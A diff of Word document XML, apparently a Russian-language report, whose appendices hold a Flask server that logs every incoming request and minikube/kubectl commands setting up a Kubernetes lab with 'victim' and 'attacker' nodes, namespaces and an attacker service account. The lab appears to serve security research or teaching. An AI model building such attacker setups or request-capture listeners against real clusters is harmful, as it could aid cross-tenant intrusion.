+      <w:bookmarkStart w:id="58" w:name="_Toc518292932"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8006,7 +7878,6 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="44"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -8016,10 +7887,13 @@
         </w:numPr>
         <w:jc w:val="center"/>
       </w:pPr>
+      <w:bookmarkStart w:id="59" w:name="_Toc231834658"/>
+      <w:bookmarkEnd w:id="58"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>приложение А</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="59"/>
     </w:p>
     <w:p>
       <w:r>
@@ -8031,15 +7905,66 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>from flask import Flask, request</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>flask</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Flask</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>request</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8047,7 +7972,6 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -8233,23 +8157,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">def </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>catch_all</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(path):</w:t>
+        <w:t>def catch_all(path):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8273,17 +8181,8 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>f"{</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>request.method</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>f"{request.method</w:t>
+      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -8324,7 +8223,6 @@
         </w:rPr>
         <w:t xml:space="preserve">    for key, value in </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -8347,15 +8245,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>items(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -8411,23 +8301,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    if </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>request.data</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve">    if request.data:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8459,15 +8333,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">"BODY:", </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>request.</w:t>
+        <w:t>"BODY:", request.</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -8477,7 +8343,6 @@
         </w:rPr>
         <w:t>data.decode</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -8542,6 +8407,7 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -8551,22 +8417,13 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>app.run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>app.run(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -8582,6 +8439,7 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -8592,11 +8450,13 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -8609,14 +8469,36 @@
           <w:numId w:val="0"/>
         </w:numPr>
         <w:jc w:val="center"/>
-      </w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="60" w:name="_Toc231834659"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Приложение Б</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Приложение</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Б</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="60"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve">1 – </w:t>
       </w:r>
       <w:r>
@@ -8643,27 +8525,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>eval $(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> docker-env --unset)</w:t>
+        <w:t>eval $(minikube docker-env --unset)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8687,25 +8549,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">minikube </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -8725,19 +8576,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -p </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> -p minikube</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8760,25 +8600,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>minikube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> start \</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>minikube start \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8818,27 +8647,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubernetes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-version=v1.33.1 \</w:t>
+        <w:t xml:space="preserve">  --kubernetes-version=v1.33.1 \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8882,25 +8691,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> label node minikube-m02 tenant=victim --overwrite</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl label node minikube-m02 tenant=victim --overwrite</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8913,25 +8711,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> label node minikube-m03 tenant=attacker --overwrite</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl label node minikube-m03 tenant=attacker --overwrite</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8955,25 +8742,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> get nodes --show-labels</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl get nodes --show-labels</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8986,25 +8762,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> get pods -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl get pods -</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -9014,19 +8779,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">n </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>n kube</w:t>
+      </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -9048,65 +8802,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> get pods -n </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-system -l k8s-app=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kube</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-proxy</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl get pods -n kube-system -l k8s-app=kube-proxy</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9130,25 +8833,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> create namespace tenant-a</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl create namespace tenant-a</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9161,25 +8853,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> create namespace tenant-b</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl create namespace tenant-b</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9203,45 +8884,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b create </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> attacker</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b create serviceaccount attacker</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9265,27 +8915,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apply -f attacker-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl apply -f attacker-</w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -9296,7 +8934,6 @@
         </w:rPr>
         <w:t>rbac.yaml</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
@@ -9320,25 +8957,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
